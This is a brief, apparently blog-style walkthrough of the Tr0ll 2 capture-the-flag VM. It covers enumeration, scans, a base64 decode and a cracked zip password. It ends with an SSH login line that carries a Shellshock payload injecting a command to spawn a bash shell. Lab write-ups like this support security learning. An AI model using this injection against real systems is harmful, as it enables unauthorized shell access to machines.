TR0LL: 2 Walkthrough
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is…
The next machine in the Tr0ll series of VMs. This one is a step up in difficulty from the original Tr0ll but the time required to solve is approximately the same, and make no mistake, trolls are still present! :)
Difficulty is beginner++ to intermediate.
Enumeration
We have got,
- ftp
- ssh
- http
Always keep HTTP at the end.
More Enumeration…
- FTP
- SSH
- HTTP
- Manual Testing
2. Nikto Scan
3. Gobuster + Dirb
i found nothing here…
It seems to be a real troll….😩
Let’s think what all files we get from the target, some text docs + images.
let’s look deep into images …
Let’s look into y0ur_self,
Finding the Point Of Intrusion
Before starting it, kindly do the base64 decode
base64 -d answer.txt > list
No luck,,,
cracked: ItCantReallyBeThisEasyRightLOL
Ref: https://linuxconfig.org/how-to-crack-zip-password-on-kali-linux
Let’s login
ssh noob@192.168.103.173 -i noob ‘() { :;}; /bin/bash’